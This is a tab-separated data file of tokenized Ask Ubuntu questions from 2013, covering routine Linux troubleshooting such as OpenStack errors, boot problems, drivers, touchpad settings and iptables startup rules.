381984	openstack always fails to create an instance	i discovered that nova-api always shows this : nova-api.log:2013-11-25 12:28:07.200 5507 info nova.api.openstack [ req-1925c872-e3ee-46ff-8061-1e1903f223e7 03cc38dac979425abb2b76763b922036 c010bd7c02174062bb1df9c9cc9e6c15 ] http : //controller.cloud.level2crm.com:8774/v2/c010bd7c02174062bb1df9c9cc9e6c15/servers returned with http 500 i can create the instance from command line : nova boot -- flavor 1 -- key_name gaguilar -- image 2291748e-41ca-41c5-9350-64886840fdfb -- security_group default test + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + | property | value | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + | os-ext-sts : task_state | scheduling | | image | cirros 0.3.1 | | os-ext-sts : vm_state | building | | os-srv-usg : launched_at | none | | flavor | m1.tiny | | id | 1110c245-1cf4-4535-bc94-c13fd59f291d | | security_groups | [ { u'name ' : u'default ' } ] | | user_id | 03cc38dac979425abb2b76763b922036 | | os-dcf : diskconfig | manual | | accessipv4 | | | accessipv6 | | | progress | 0 | | os-ext-sts : power_state | 0 | | os-ext-az : availability_zone | nova | | config_drive | | | status | build | | updated | 2013-11-25t12:52:12z | | hostid | | | os-srv-usg : terminated_at | none | | key_name | gaguilar | | name | test | | adminpass | 8l4ti8fleqwc | | tenant_id | c010bd7c02174062bb1df9c9cc9e6c15 | | created | 2013-11-25t12:52:12z | | os-extended-volumes : volumes_attached | [ ] | | metadata | { } | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + but i always get : nova list + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- + -- -- -- -- + -- -- -- -- -- -- + -- -- -- -- -- -- -+ -- -- -- -- -- + | id | name | status | task state | power state | networks | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- + -- -- -- -- + -- -- -- -- -- -- + -- -- -- -- -- -- -+ -- -- -- -- -- + | 2f844996-122d-4975-8d38-7d048526f976 | test | error | none | nostate | | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- + -- -- -- -- + -- -- -- -- -- -- + -- -- -- -- -- -- -+ -- -- -- -- -- + i do n't understand since controller.cloud.level2crm.com:8774 is available and reachable any help on this ? nooope ! it seems i still have the same problem . i 've fond following in the scheduler . i do n't know why it worked last time . 2013-11-25 13:10:03.689 6395 error nova.scheduler.filter_scheduler [ req-fd0c887b-33a5-4463-806b-672ed13a06c6 03cc38dac979425abb2b76763b922036 c010bd7c02174062bb1df9c9cc9e6c15 ] [ instance : 1b619d76-f9d8-4019-810f-a857bf1987b9 ] error from last host : red1 ( node red1 ) : [ u'traceback ( most recent call last ) : \n ' , u ' file `` /usr/lib/python2.7/dist-packages/nova/compute/manager.py '' , line 1037 , in _build_instance\n set_access_ip=set_access_ip ) \n ' , u ' file `` /usr/lib/python2.7/dist-packages/nova/compute/manager.py '' , line 1410 , in _spawn\n log.exception ( _ ( \'instance failed to spawn\ ' ) , instance=instance ) \n ' , u ' file `` /usr/lib/python2.7/dist-packages/nova/compute/manager.py '' , line 1407 , in _spawn\n block_device_info ) \n ' , u ' file `` /usr/lib/python2.7/dist-packages/nova/virt/libvirt/driver.py '' , line 2063 , in spawn\n admin_pass=admin_password ) \n ' , u ' file `` /usr/lib/python2.7/dist-packages/nova/virt/libvirt/driver.py '' , line 2441 , in _create_image\n net = netutils.get_injected_network_template ( network_info ) \n ' , u ' file `` /usr/lib/python2.7/dist-packages/nova/virt/netutils.py '' , line 74 , in get_injected_network_template\n if not ( network_info and template ) : \n ' , u ' file `` /usr/lib/python2.7/dist-packages/nova/network/model.py '' , line 379 , in __len__\n return self._sync_wrapper ( fn , *args , **kwargs ) \n ' , u ' file `` /usr/lib/python2.7/dist-packages/nova/network/model.py '' , line 366 , in _sync_wrapper\n self.wait ( ) \n ' , u ' file `` /usr/lib/python2.7/dist-packages/nova/network/model.py '' , line 398 , in wait\n self [ : ] = self._gt.wait ( ) \n ' , u ' file `` /usr/lib/python2.7/dist-packages/eventlet/greenthread.py '' , line 168 , in wait\n return self._exit_event.wait ( ) \n ' , u ' file `` /usr/lib/python2.7/dist-packages/eventlet/event.py '' , line 120 , in wait\n current.throw ( *self._exc ) \n ' , u ' file `` /usr/lib/python2.7/dist-packages/eventlet/greenthread.py '' , line 194 , in main\n result = function ( *args , **kwargs ) \n ' , u ' file `` /usr/lib/python2.7/dist-packages/nova/compute/manager.py '' , line 1228 , in _allocate_network_async\n dhcp_options=dhcp_options ) \n ' , u ' file `` /usr/lib/python2.7/dist-packages/nova/network/api.py '' , line 49 , in wrapper\n res = f ( self , context , *args , **kwargs ) \n ' , u ' file `` /usr/lib/python2.7/dist-packages/nova/network/neutronv2/api.py '' , line 276 , in allocate_for_instance\n **search_opts ) .get ( \'security_groups\ ' ) \n ' , u ' file `` /usr/lib/python2.7/dist-packages/neutronclient/v2_0/client.py '' , line 108 , in with_params\n ret = self.function ( instance , *args , **kwargs ) \n ' , u ' file `` /usr/lib/python2.7/dist-packages/neutronclient/v2_0/client.py '' , line 466 , in list_security_groups\n retrieve_all , **_params ) \n ' , u ' file `` /usr/lib/python2.7/dist-packages/neutronclient/v2_0/client.py '' , line 1197 , in list\n for r in self._pagination ( collection , path , **params ) : \n ' , u ' file `` /usr/lib/python2.7/dist-packages/neutronclient/v2_0/client.py '' , line 1210 , in _pagination\n res = self.get ( path , params=params ) \n ' , u ' file `` /usr/lib/python2.7/dist-packages/neutronclient/v2_0/client.py '' , line 1183 , in get\n headers=headers , params=params ) \n ' , u ' file `` /usr/lib/python2.7/dist-packages/neutronclient/v2_0/client.py '' , line 1168 , in retry_request\n headers=headers , params=params ) \n ' , u ' file `` /usr/lib/python2.7/dist-packages/neutronclient/v2_0/client.py '' , line 1111 , in do_request\n self._handle_fault_response ( status_code , replybody ) \n ' , u ' file `` /usr/lib/python2.7/dist-packages/neutronclient/v2_0/client.py '' , line 1081 , in _handle_fault_response\n exception_handler_v20 ( status_code , des_error_body ) \n ' , u ' file `` /usr/lib/python2.7/dist-packages/neutronclient/v2_0/client.py '' , line 88 , in exception_handler_v20\n message=message ) \n ' , u'neutronclientexception : 404 not found\n\nthe resource could not be found.\n\n \n ' ] 2013-11-25 13:10:03.704 6395 warning nova.scheduler.driver [ req-fd0c887b-33a5-4463-806b-672ed13a06c6 03cc38dac979425abb2b76763b922036 c010bd7c02174062bb1df9c9cc9e6c15 ] [ instance : 1b619d76-f9d8-4019-810f-a857bf1987b9 ] setting instance to error state .
381989	rc.local is not executed on tartup in ubuntu server 13.04	i 'm trying to add some iptables rules on startup for my vpn service in rc.local . my rc.local file is : # ! /bin/sh -e # # rc.local # # this script is executed at the end of each multiuser runlevel . # make sure that the script will `` exit 0 '' on success or any other # value on error . # # in order to enable or disable this script just change the execution # bits . # # by default this script does nothing . iptables -a forward -m state -- state related , established -j accept iptables -a forward -s 10.8.0.0/24 -j accept iptables -a forward -j reject iptables -t nat -a postrouting -s 10.8.0.0/24 -j snat -- to-source # # # # # # # exit 0 it is executable : -rwxr-xr-x 1 root root 529 nov 24 06:01 /etc/rc.local but it does n't run on startup ! ( none of rules are added ! ) what is the problem ? how can make it run on startup ?
381992	dual boot , error	i managed to get into the boot manager , there are three options , windows 7 , which works fine and two times ubuntu , both fail with a error saying `` 0xc0000098 '' i used easybcd .
381999	no sound other then drumming !	its been almost 47 days that i am using ubuntu 13.04 , and today i came to know that ubuntu has its tones for different actions like for shutdown login logout new device inserted but after booting it only plays drumming tone , i think thatâs for notifying system is ready but what about others . how can i enable them , i want all the tones present in /usr/share/sounds/ubuntu/stereo in action . only system-ready.ogg is working . i have tried sudo cp /usr/share/sounds/ubuntu/stereo/* /usr/share/sounds/ but even it doesnât work out .
382001	after resent update hot keys do n't work . ubuntu 13.10	before some packages updated everything was working fine . now i ca n't switch keyboard layout with alt-shift , open terminal with ctrl-alt-t , also my laptop 's shortcuts for volume , brightness , etc . do n't work as well . only alt-tab still works . where should i look to troubleshoot this ? i 've looked for open bugs , but did n't find any that would be close enough .
382002	what do + and - mean in the output of jobs command ?	i can not find the answer anywhere . when i have several jobs that are in the background and i list them with jobs i get the following : [ 1 ] stopped command1 [ 2 ] stopped command2 [ 3 ] - stopped command3 [ 4 ] + stopped command4 the plus sign is always on the last one , and the minus is on the second to last . what do these things mean ?
382005	xdotool to automate moves in epiphany ( boulderdash clone )	i 'm trying to automate critical moves in my favorite boulderdash clone called `` epiphany '' ( available through ubuntu software centre ) . in the following example the character should move : 3x `` down arrow '' and 1x `` right arrow '' . writing a script is pretty straightforward . once launched it ( 1 ) sets focus to the game window and ( 2 ) sends the keystroke commands through xdotool . # ! /bin/bash # set focus to epiphany xdotool search -- onlyvisible -- class epiphany windowactivate sleep 0.5 # move down one unit xdotool keydown -- delay 100 down arrow ; xdotool keyup -- delay 12 down arrow # move down one unit xdotool keydown -- delay 100 down arrow ; xdotool keyup -- delay 12 down arrow # move down one unit xdotool keydown -- delay 100 down arrow ; xdotool keyup -- delay 12 down arrow # move right one unit xdotool keydown -- delay 100 right arrow ; xdotool keyup -- delay 12 right arrow but , this solution does n't work consistently . sometimes the character only completes part of the move - e. g. only 2x `` down arrow '' . at other times he moves too slow and is crushed by the diamond . are there any suggestions on how to solve this - preferrably using xdotool ? edit : the straightforward commands like xdotool key down arrow - as suggested - do n't work . the character in the game does n't move at all .
382010	installation 12.04 64-bit issue	i am trying to install ubuntu 12.04 64-bit via live boot dvd , when i choose `` install '' instead of `` try '' , i get to the screen where i need to choose where i want to install ubuntu ( installation type screen ) . the problem is that i can not select any stations : there are none there . on the bar from which you 're supposed to see all your stations , i see nothing but /dev/sda here . i 've tried the following things ( note : i 've got an ssd ! ) made free space on my ssd , as in : unformatted space and install from live boot dvd ; made free space on my ssd , as in : unformatted space and install from windows installer ( in windows , then start the dvd up ) ; made free space on my ssd and have it formatted in windows ( ntfs obviously ) , no fancy options none of the above mentioned options gets me ubuntu installed . i must mention : when i installed via windows and rebooted the pc , instead of seeing the dual-boot option , i got some busybox issue , with initramfs or something like that . i ca n't get it to work ... does someone know the solution to this ?
382011	unable to lower screen brightness 13.10	i had this issue since i installed ubuntu 13.04 long ago , and i have tried missing around with the gedit files but no joy . graphics card : intel integrated graphics 3000hd
382012	installing ubuntu onto a laptop with no operating system	my hp laptop 's hard drive crashed , and i do n't want to install windows , instead , i want to install ubuntu , how should i do that ?
382015	gsm does not work : dhcp instead of ppp ?	i built an erricson gsm device into my thinkpad and am trying to get it work on ubuntu . the gsm network is functional with windows , so the hardware is working and and apn and credentials are correct . below are screenshots of my networkmanager configuration . the relevant syslog excerpt can be found here : http : //paste.ubuntu.com/6474080/ i think the problem is , that networkmanager attempts to get an ip over dhcp instead of using ppp , as configured . is this a known problem ? does anyone have another idea what the problem ( or better , a solution ) could be ? any more important information i should provide ?
382016	how can i install a usb bluetooth dongle in ubuntu 12.04 ?	i would like to use a usb bluetooth dongle on ubuntu 12.04 . i guess that i will have install some drivers first . so where do i get those ? are there any universal bluetooth drivers ? do i have to do anything else to this working ? edit : when i run lsusb i get the following result : bus 001 device 002 : id 80ee:0021 virtualbox usb tablet bus 001 device 003 : id 0a12:100b cambridge silicon radio , ltd bus 001 device 001 : id 1d6b:0001 linux foundation 1.1 root hub just in case : i am running ubuntu in virtualbox . p.s . : i am using this usb bluetooth dongle : sitecom cn-524 http : //www.sitecom.com/lu/micro-bluetooth-40-usb-adapter/cn-524/p/1531
382019	uninstalling/reverting thunderbird updates	is there an easy way to uninstall an update to thunderbird in ubuntu 13.04 ?
382020	how do i remove localhost nameserver from resolv.conf	currently my /etc/resolv.conf reads : nameserver 127.0.0.1 nameserver 10.255.0.101 nameserver 10.255.0.11 and i want it to instead read : search [ my domain ] nameserver 10.255.0.101 nameserver 10.255.0.11 nameserver 208.67.222.222 nameserver 208.67.220.220 as both /etc/resolv.conf and /etc/resolv.conf.d/head ca n't be edited by hand , how can i make this change ?
382024	keybord problems	recently i started experiencing problems with my keyboard . specifically , every time i type this symbol '' ; '' appears between letters or when i press the spacebar and it is quite frustrating since i have top go back and revise the whole text . i used to have two languages in my layout ( greek and english ( uk ) but i deleted the greek . any suggestions on how i can solve it ? ? th ; an ; k ; s
382026	install nvidia 13.04	i have tried some of the suggestions found on this page to install nvidia drivers for my geforce 610 m on me notebook . im using ubuntu 13.10 the system-adition drivers option dosent work since it dosent show any drivers to install . ihave followed the second option here 2 times . http : //www.dedoimedo.com/computers/ubuntu-ringtail-nvidia.html both times sudo /sbin/lsmod | grep nvidia dosent do anything . and when i restart the comp . ubuntu stoped working completly and i had to re-install averything . is there anything els i can try ? edit : shoud i install another version of ubuntu ? 12.something or 13.04 instead ?
382027	trouble with ubuntu 12.10 post installation	dell inspiron 5150 laptop pentium 4 3.x mhz processor 1.5 gb ram 30 gb toshiba hd in 3 partitions : 32 mb fat for dell utility , 14.x gb ntfs for win xp pro sp2 , 14.x ext4 for linux i went through the installation procedures for ubuntu v 12.10 as outlined here : http : //www.ubuntu.com/download/desktop/install-desktop-latest everything went as described in the documentation ( well done documentation by the way ) . i did n't have any problems with the installation . however once completed , i rebooted the laptop and i got to the login screen just fine . once i entered the login id & password , the screen went black and the mouse and keyboard `` froze . '' i could not do anything . i have been digging around here on the `` questions and answers '' section of the support/knowledge base of ubuntu . i have seen that several others have experienced something similar . however , there does n't seem to be a definitive answer or solution to the problem . what are my options at this point ? any and all suggestions , hints , solutions , etc are welcome . thanks in advance ... .
382028	sharing an ubuntu applications	i developed a c++ application depending on a few libraries ( qt/boost/r ) . i would like to share it with a collegue in the easiest way . our first attempt was simply to copy-paste the compiled binaries from one computer to the other ( both of us are on ubuntu ) . doing so , my collegues simply obtained a `` binary file impossible to launch '' . when trying on my colleague computer ldd myapp i get : myapp is not an dynamic executable . any help/hint/link to solve our problem would be greatly appreciate .
382030	add command to menu entry in 13.10 to convert images to jpg	it is possible to add a menu entry that when i click a picture it says `` convert to jpg '' and executes this command ? convert -format jpg { the right click file } because normally when i want to attach screenshots they are very heavy cause they are stored in png . it will be very helpful . thanks !
382031	how do i get my old xmodmap settings back ?	i wanted to disable `` paste '' action on mouse wheel click , and i use the code below ( from this msg : http : //askubuntu.com/a/55988 ) ; xmodmap -e `` pointer = 1 25 3 4 5 6 7 8 9 '' it worked but also disabled `` open in new tab '' function in browser . now i just want to get my old damn settings back ! can anyone explain what should i do clearly ?
382032	normal password not accepted in console session	home screen account/password are not accepted in console mode ? is there a trick to this ? i enter the exact cred 's after entering console mode but it wo n't accept cred 's there . do i need to stop it at grub and redo/change my account password ?
382035	why is my svnmerge showing up as not installed ?	i upgraded from 12.04 to 13.04 and in the process my svnmerge stopped working . synaptic tells me my subversion-tools is on 1.7.9-1+nmu6ubuntu3 . my svn is `` svn , version 1.7.9 ( r1462340 ) '' $ svnmerge avail the program 'svnmerge ' is currently not installed . you can install it by typing : sudo apt-get install subversion-tools running the above i get a delightful ... reading state information ... done subversion-tools is already the newest version . ... what can i do to fix this ? basic svn commands seem to be working . thanks !
382037	grub , `` no such partition '' when trying to boot	i am new to ubuntu . i had ubuntu installed on my system . no secondary operating system only ubuntu . i am trying to start my system but i am getting error as error : no such partition enter rescue mode ... grub rescue > i am getting this message on a black screen . i 'm not able to start anything . i 'm not even getting inside the home screen . any pointers on this ?
382041	dpkg : error processing openoffice4.0-debian-menus_4.0-9714_all.deb	trying to install openoffice on ubuntu 13.10 64bit . the install goes with out a hitch but the application does not show up in my gui applications window . is this because of desktop integration ? when i try to install the desktop integrator i get this ... jacob @ jacob-desktop : ~/mydebs/en-us/debs/desktop-integration $ sudo dpkg -i *.deb ( reading database ... 172964 files and directories currently installed . ) unpacking openoffice-debian-menus ( from openoffice4.0-debian-menus_4.0-9714_all.deb ) ... dpkg : error processing openoffice4.0-debian-menus_4.0-9714_all.deb ( -- install ) : trying to overwrite '/usr/bin/soffice ' , which is also in package libreoffice-common 1:4.1.2~rc3-0ubuntu1 /usr/bin/gtk-update-icon-cache gtk-update-icon-cache : cache file created successfully . /usr/bin/gtk-update-icon-cache gtk-update-icon-cache : cache file created successfully . processing triggers for gnome-icon-theme ... processing triggers for hicolor-icon-theme ... processing triggers for shared-mime-info ... processing triggers for gnome-menus ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for mime-support ... errors were encountered while processing : openoffice4.0-debian-menus_4.0-9714_all.deb
382044	lotus notes 8.5.1 ubuntu 10.04 and 12.04 error in loading dll	i have a notes application which is built for used in windows environment . the application can read smartcard using the omnikey 5321 smartcard reader . however when i tried to open the application in a lotus notes 8.5.1 ( linux version , not windows using wine ) installed in ubuntu 10.04 or 12.04 , i get the error `` error in loading dll '' . now i can do a bit of programming myself but i 'm not sure where to start for me to troubleshoot the error . what dll could it possibly try to load ? as far as i know after asking the previous developer , they did n't use any special dll when writing the notes application . all they need to do is to install the smartcard reader driver into windows and have it working and then by default lotus notes will know a smartcard reader is in active . they never had to code something like say for the application to check whether a smartcard reader is connected or not . what i 've done so far is add the installation directory of lotus notes into path but even that does n't solve my problem . i 've also tried installing a windows lotus notes ( same version - 8.5.1 ) under wine but that is even worse with the lotus notes ca n't even start at all . the smartcard reader driver have all been installed properly and it can read using the pcsc_scan command from pcsc_tools . so if anybody can at least tell me where to start looking for error then it 'll be a great help . thanks .
382045	how to permanently disable my trackpad ?	i want to permanently disable my trackpad on my dell inspiron running ubuntu 13.10 . i read some threads in this forum and tried to make a bios setting change . nothing worked . whenever my bluetooth mouse took a nap the trackpad came back on . finally i moved the 50-synaptics.conf file out of the /user/share/x11/xorg.conf.d/ directory and my problem is solved . is there another alternative ? it sure would be nice for the blue fn-trackpad key to work . it would obviously be better if x did not enable the trackpad without my request just because my bluetooth mouse is trying to save batteries .
382047	mac address on 2 nic	my computer have 2 nics and i want to share internet from eth0 to eth1 like that internet < < == > > router1 < < = > > eth0 < > ubuntu gateway ( my pc ) â < > eth1 < < == > > wifi router < == > pc1 , pc2 , ... i think i will config like this page . but i do n't know if router1 can see mac of eth1 and pc1 , pc2 , ... or it can only see mac of eth0 . because i want to hide mac of all device . someone can help me how to config to hide all mac address of my device sorry because my english not good
382048	i ca n't update my ubuntu ? what 's the solution ?	dear ubuntu users , hello . the problem that im having , is updating my system of ubuntu , you know security updates and ppa 's . i check for updates and do have a secure connection , but i unexpectedly get message saying , w : failed to fetch gzip : /var/lib/apt/lists/partial/us.archive.ubuntu.com_ubuntu_dists_precise-backports_universe_source_sources hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/us.archive.ubuntu.com_ubuntu_dists_precise-backports_universe_binary-amd64_packages hash sum mismatch e : some index files failed to download . they have been ignored , or old ones used instead . i go to the directory the var/lib/apt/lists/parital here is the image of the directory/file system filedirectoryissue.png i went to the directory and i found all the files failed , but two of them are not failed . have you had this problem , what was your solution toward this problem . i keep my system up to date with upgrades , a die hard linux user . if you have any recommendations , i would apperciate it ! thank you ! system ubuntu 12.04 64bit
382049	crontab and ssmtp	my server is ubuntu 12.04.3 cron jobs are working fine . i can send emails through command line , either using mail , ssmtp or sendmail . i have set the correct email address on top of the crontab -e mailto=myemail @ gmail.com and to test it i added in crontab : * * * * * echo blaaah but what i get in mail.log is ssmtp [ 4267 ] : 550 5.7.1 client does not have permissions to send as this sender which is strange as i am able to send email through command line.any ideas ?
382055	how to speed up search for locally installed applications in dash in ubuntu 13.10 ?	i upgraded to ubuntu 13.10 . after upgrading , whenever i open the dash to search for an application , it takes at least a minute before it starts to show some result . the new scopes addition has made dash painfully slow . is it possible to speed up the dash response time ? i have already turned off `` include online search results '' . i can live with not internet information on dash but can not stand a slow application menu ( which is its primary feature )
382057	alias command defining problem	define the noagtw alias for a group of commands counting and displaying the number of all files in your accountâs space with the names starting with g , t , and w and put the alias in your environmental file . display all your aliases .
382058	advice on building my first pc with ubuntu	i have just started to receive the pieces of my computer , i am planning on using just ubuntu on this computer . i have ordered an amd a10 apu , a msi motherboard , a seagate hard-drive , and 4gb of ram . i have not ordered a dvd drive . have i made a fatal mistake ? i have a usb drive prepared to install ubuntu on my new pc but i am worried about installing necessary drivers that came with my motherboard . how will i load these drivers ?
382062	volume hotkeys not working on p55-a5312 laptop	i have a toshiba p55-a5312 laptop , i pulled the drive and installed an ssd and ubuntu 13.04 . everything works except the volume up/down hotkeys . might anyone have a good place to start ?
382064	samba question , as of yet unsolved	system worked recently ( yesterday ) but now refuses to let me access shares on other computers.one new install , laptop 12.04 not recognized by network same network name on all units i 'm baffled ...
382068	failed to load session `` gnome '' after system crash	today my laptop suddenly crashed , and after restart , the log-in screen changed ( it looked like unity ) , and when i tried to log-in , i received the following error : `` failed to load session `` gnome '' `` . i went to recovery menu , tried to repair broken packages and update grub bootloader . it did not help . now i have the same screen , but when i try to login , it says that i successfully logged in , but the log-in screen does not disappear and i ca n't do anything further . does anyone have any ideea what 's wrong ?
382087	can i only show windows that are open on the currently focused workspace on the launcher bar ?	i have few windows opened on my first workspace , and few on second , but all appear on switch bar in the bottom . i want to have in the bar windows from only one workspace i am using now . i was looking for an answer in settings of applet , but there is nothing . also workspaces in xfce are set on 0 , but they come from compiz . xubuntu 13.10
382088	distro : wrong version : 12.04 ! = 12.04.3	i am trying with wubi.exe to install ubuntu on a pentium-computer with windows xp . i become this error in the wubi-12.04.3-rev279.log file : distro : wrong version : 12.04 ! = 12.04.3 can i change something ?
382094	disable unity launcher to launch in full screen ?	when i press the application launcher it come in full screen and it has blurry background . i want it small and transparrent ... because it is laggy ! i do n't know how to say what i want . i searched on the internet but i ca n't found it . i did it before but i ca n't remembor how did i found it
382095	on ubuntu 12.04 lts hard drive says i ca n't save stuff to my drive ?	looking at the disk utility its says disk failture is immiment on the smart status ... . ? i still have 21 gbs left , its does say something about the swap data ?
382096	how can i run ubuntu with minimal system resources ?	i installed ubuntu on a quite old pc ( pentium 4 2ghz on-board graphics ) . how can i turn off all unneeded effects to speed up the system-experience ? i know a better solution would have been to just install xubuntu or lubuntu , but i would like to know how to run the standard ubuntu on a low-resources computer .
382100	install ubuntu linux in an existing empty ext4 partition	i am using install ubuntu 12.04.3 lts running from an iso dvd . before running install , disk utility was used to set desired partitions with logical partitions of 108 gb ext4 for ubuntu and 20 gb for swap and no empty space . the option “install ubuntu alongside w7” asked me to free up space from 2 partitions to install linux . the “advanced partitioning tool” option showed all partitions , but i could not find a way to select the ext4 partition for install . i tried deleting the ext4 partition to let the installer create it in the space freed up . clicking “install now” gave the message “no root file system is defined please correct this from the partitioning menu” i could not find how to do that .
382101	graphics issues after migration from 12.04 to 13.10 with amd graphics	i used 12.04 for a long time and all worked fine . now i downloaded 13.10 and i think , graphics drivers does n't work as they should . launcher does n't hide ( although it 's set in settings ) and launcher size is still default when i set another value ( i want it smaller ) . i have problems with youtube videos too . i tried all three drivers in menu and all of them do the same . all previous versions worked fine . can you please help , or should i downgrade back to 12.04 ? graphics card is sapphire 7750 oc . thanks
382105	all software requires installation of untrusted packages	all software requires installation of untrusted packages . i can not solve this problem by any method described in similar question posts .
382106	reset launcher in xubuntu 13.10	i added a couple of programs to the launcher in xubuntu 13.10 and now the launcher is off centre and has multiple separators on the right side of the screen . is there any way to reset the launcher ? thanks !
382110	how can i permanently change touchpad settings ?	i added this script to my startup programs to change my touchpad settings on startup : synclient tapbutton2=2 tapbutton3=3 but this settings do n't stay this way after startup . i changed my script to watch the results : synclient tapbutton2=2 tapbutton3=3 synclient | grep tapbutton > $ home/tmp/touchpad.txt results were confusing , touchpad still did n't work the way i want : $ cat ~/tmp/touchpad.txt tapbutton1 = 1 tapbutton2 = 2 tapbutton3 = 3 but when i ran synclient | grep tapbutton in gnome-terminal after startup the output was : $ synclient | grep tapbutton tapbutton1 = 1 tapbutton2 = 3 tapbutton3 = 0 i tried adding delays ( sleep 10s ) to my script before and/or after every line , but this did n't help too . therefore i assume that there is another program , script or daemon that changes touchpad settings , but i could n't find which one . two questions : which program , script or daemon can change touchpad settings ? is there another way to permanently change your touchpad settings ? maybe adding such script to startup is not supposed to be working . update i tried putting section `` inputclass '' identifier `` touchpad my settings '' matchistouchpad `` on '' matchos `` linux '' matchdevicepath `` /dev/input/mouse* '' option `` tapbutton1 '' `` 1 '' option `` tapbutton2 '' `` 2 '' option `` tapbutton3 '' `` 3 '' option `` palmdetect '' `` on '' endsection into file /usr/share/x11/xorg.conf.d/99-my.conf . it did n't help as well .
382111	bluetooth driver disapeared after 13.10	since i updated to 13.10 , my blutooth adapter is not recognized , so its like there is no bluetooth on the computer anymore . ( it is not the indicator problem , it works fine ) .
382113	lenovo g580 install fails	i 'm trying to get a lenovo g580 with windows 7 to dual-boot with ubuntu 12.04.3 . it has uefi so wubi did n't work for me . then i found some advice to install from a livedvd so i shrank the windows c : partition to make space for ubuntu . the next step in the advice was to load the livedvd and use gparted to merge the unallocated space to the d : drive ( because my lenovo laptop has already got the max 4 drives ) but no matter what i did , i could n't get the drives to merge & i 'm finding it very complicated in the advice on the net . can anyone tell me a step-by-step guide of getting ubuntu to dual boot on a lenovo laptop which has `` one key recovery '' .
382117	cleaning hard drive	if someone got onto my computer remotely and installed malware/remote-access malware so they can easily get on in the future , if i do a fresh install with a new downloaded .iso , will that get rid of any/all malware without question ?
382120	ubuntu hard disk filled up one day , empty the next day	this is bizarre to me and any insight is welcome . i encountered an issue on our ubuntu ( 11.04 ) server where i kept receiving reports that the hard was completely full ( 1tb ) . running the disk analyzer , it did seem that indeed the entire disk was occupied . this was very strange since it is a relatively new machine with only a few applications . before i could check anything further the server crashed and i had to reboot the machine several ( 7+ times ) before it started successfully . once it restarted everything seemed ok , and best of all the disk usage only reported 5gb being used ( instead of 1tb ) . given the symptoms above , any ideas as to the possible causes , or anything i should check for , is very welcome . thank you !
382122	kaffeine does not recognise dvb-t device usb stick asus u3100mini_plus	i would like to ask why kaffeine does not recognize dvb-t device usb stick asus u3100mini_plus when plugged to my laptop . i run ubuntu 12.04 and this is output from console : home @ home : ~ $ dmesg | tail [ 749.143370 ] usb 1-4 : dvb_usb_v2 : found a 'asus u3100mini plus ' in cold state [ 749.211849 ] usb 1-4 : dvb_usb_v2 : downloading firmware from file 'dvb-usb-af9035-02.fw' [ 749.524639 ] usb 1-4 : dvb_usb_af9035 : firmware version=12.13.15.0 [ 749.524707 ] usb 1-4 : dvb_usb_v2 : found a 'asus u3100mini plus ' in warm state [ 749.526937 ] usb 1-4 : dvb_usb_v2 : will pass the complete mpeg2 transport stream to the software demuxer [ 749.527165 ] dvb : registering new adapter ( asus u3100mini plus ) [ 749.529993 ] i2c i2c-4 : af9033 : firmware version : link=12.13.15.0 ofdm=6.20.15.0 [ 749.533876 ] usb 1-4 : dvb : registering adapter 0 frontend 0 ( afatech af9033 ( dvb-t ) ) ... [ 749.576808 ] input : afa technologies inc. af9035a usb device as /devices/pci0000:00/0000:00:0b.1/usb1/1-4/1-4:1.1/input/input10 [ 749.577628 ] hid-generic 0003:0b05:1779.0003 : input , hidraw0 : usb hid v1.01 keyboard [ afa technologies inc. af9035a usb device ] on usb-0000:00:0b.1-4/input1
382123	lubuntu boot problem	i installed lubuntu 13.10 , but when i try to boot from hard drive , the screen stays black . but when booted from usb it boots normally from hard drive . this means i ca n't try to reinstall . how can i get my pc to boot from the hard disk ?
382124	exception : 300 at tumbler_detect_headphone+0x1c/0x50 on imac g4	i 've made a live cd of ubuntu 13.04 , downloaded from here , which i 'm trying to run on my imac g4 . however , upon typing live into the command line at boot , the nice startup screen shows up ( with the five little dots ) . after a few dozen seconds , though , i see a bunch of white text on a black background . the text is primarily a bunch of memory addresses , but there is some english , reproduced here : nip [ d3b17cec ] tumbler_detect_headphone+0x1c/0x50 [ snd_powermac ] lr [ d3b19068 ] device_change_handler+0x44/0x264 [ snd_powermac ] ... . ( i do n't feel like copying the whole thing out right now - it 's a screenfull ) . i do have the headphones plugged in , if that makes a difference . is there a way to install ubuntu on my imac g4 ?
382126	alt+tab application switcher like in windows 7	i am new for linux and ubuntu . i did n't like unity 's built in application switcher . i have been looking for simple and fast ( like in windows 7 ) application switcher for ubuntu with unity desktop . which shows a grid with opened applications and one can switch by using up/down/left/right arrows or by subsequent pressing alt+tab i have tried all options in compiz and the most close option was static application switcher but i can not use arrows to switch between windows . do you have any suggestion which complies to my needs ? i would appreciate any help .
382127	set apod as lightdm background	is there any way i could set the lightdm background as the astronomy picture of the day ? i assume that this could be done using bash script but it would be nice to see a variety of methods .
382128	dvd player not recognized	i need some help getting the dvd player recognized in ubuntu 12.04 . i need the to know the process how to install the packages . it worked well before installing ubuntu . please advise
382133	dualboot windows 7 on ubuntu	i have ubuntu installed and , i want windows 7 also . ( i do n't have any backups of windows from when i installed ubuntu , i have an hp deskop , also i want to boot via usb . )
